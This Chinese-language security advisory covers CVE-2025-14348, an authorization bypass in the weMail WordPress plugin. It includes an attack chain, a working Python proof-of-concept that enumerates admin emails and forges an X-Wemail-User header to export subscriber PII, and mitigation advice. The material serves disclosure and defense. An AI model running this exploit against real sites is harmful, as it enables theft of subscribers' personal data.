IPBUF安全漏洞报告
English
CVE-2025-14348 CVSS 5.3 中危

CVE-2025-14348 weMail WordPress插件授权绕过漏洞

披露日期: 2026-01-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-14348
漏洞类型
授权绕过
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
weMail WordPress插件

相关标签

授权绕过WordPress插件weMailCVE-2025-14348访问控制API安全信息泄露身份冒充

漏洞概述

weMail是一款WordPress平台的邮件营销、潜在客户生成、订阅表单、电子邮件通讯、A/B测试和自动化插件。该插件在2.0.7及之前的所有版本中存在严重的授权绕过漏洞。漏洞根源在于插件的REST API端点错误地信任HTTP请求头中的`x-wemail-user`参数来识别用户身份,而没有验证该请求是否来自经过身份认证的WordPress会话。攻击者可以利用此漏洞,在无需任何身份凭证的情况下,通过猜测或枚举管理员邮箱地址(可从公开的REST API端点`/wp-json/wp/v2/users`获取),冒充管理员身份访问敏感的CSV订阅者导出端点。一旦成功利用,攻击者可获取订阅者的个人敏感信息,包括电子邮箱地址、姓名、电话号码等PII(个人身份信息)数据。此漏洞无需用户交互即可被利用,对系统机密性造成威胁。

技术细节

漏洞存在于weMail插件的REST API实现中,具体位于CSV导出相关端点的身份验证逻辑。插件代码通过检查HTTP请求头`x-wemail-user`的值来确定当前操作用户的身份,但这一验证机制存在致命缺陷:首先,插件未验证该请求头是否来自合法的WordPress认证会话;其次,未对该请求头中的值进行任何形式的签名或token验证。攻击者只需构造一个包含目标管理员邮箱的HTTP请求头,即可绕过身份验证。漏洞代码示例显示,在处理CSV导出请求时,插件直接使用请求头中的用户标识符进行权限检查,而非依赖WordPress的核心认证机制。此外,由于WordPress默认允许通过REST API枚举用户列表(`/wp-json/wp/v2/users`),攻击者可以轻易获取有效管理员邮箱地址。修复后的版本需要实现基于WordPress nonce和会话令牌的正确身份验证机制。

攻击链分析

STEP 1
步骤1
通过访问WordPress REST API端点 /wp-json/wp/v2/users 枚举获取有效的管理员邮箱地址
STEP 2
步骤2
构造HTTP请求,在请求头中添加X-Wemail-User字段,值为目标管理员的邮箱地址
STEP 3
步骤3
向weMail插件的CSV导出REST API端点(如/wp-json/wemail/v1/csv/export)发送GET请求
STEP 4
步骤4
插件错误地信任X-Wemail-User头,将请求视为来自管理员身份,绕过身份验证机制
STEP 5
步骤5
攻击者成功获取CSV格式的订阅者敏感信息,包括邮箱、姓名、电话号码等PII数据

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # CVE-2025-14348 PoC - weMail Authorization Bypass # Target: WordPress site with weMail plugin <= 2.0.7 def enumerate_users(target_url): """Enumerate WordPress users via REST API""" users = [] endpoint = f"{target_url.rstrip('/')}/wp-json/wp/v2/users" try: response = requests.get(endpoint, timeout=10) if response.status_code == 200: users_data = response.json() for user in users_data: users.append({ 'id': user.get('id'), 'email': user.get('slug') + '@' + target_url.split('//')[1].split('/')[0], 'name': user.get('name') }) except Exception as e: print(f"[-] Error enumerating users: {e}") return users def exploit_csv_export(target_url, admin_email): """Exploit authorization bypass to access CSV subscriber data""" endpoints = [ '/wp-json/wemail/v1/csv/export', '/wp-json/wemail/v1/csv/subscribers', '/wp-json/wemail/v1/export/subscribers' ] headers = { 'X-Wemail-User': admin_email, 'Content-Type': 'application/json' } for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] SUCCESS: Exposed CSV data via {endpoint}") print(f"[+] Response: {response.text[:500]}") return response.json() elif response.status_code == 401: print(f"[-] Endpoint {endpoint} returned 401") else: print(f"[*] Endpoint {endpoint} returned {response.status_code}") except Exception as e: print(f"[-] Error accessing {endpoint}: {e}") return None def main(): target = input("Enter target WordPress URL: ").strip() print(f"[*] Enumerating users from {target}...") users = enumerate_users(target) if not users: print("[-] No users found or enumeration failed") return print(f"[+] Found {len(users)} users") for user in users: print(f" - {user['name']}: {user['email']}") if users: admin_email = users[0]['email'] print(f"\n[*] Attempting exploitation with user: {admin_email}") exploit_csv_export(target, admin_email) if __name__ == "__main__": main()

影响范围

weMail WordPress插件 <= 2.0.7

防御指南

临时缓解措施
在官方安全补丁发布前,可采取以下临时缓解措施:1) 限制访问/wp-json/wp/v2/users端点,可使用WordPress插件(如Disable REST API)阻止非授权用户枚举;2) 在Web服务器层面添加规则,拒绝包含X-Wemail-User头的外部请求;3) 临时禁用或限制CSV导出功能的访问;4) 加强WordPress站点整体安全,限制管理后台访问IP范围;5) 监控日志中的异常REST API访问行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表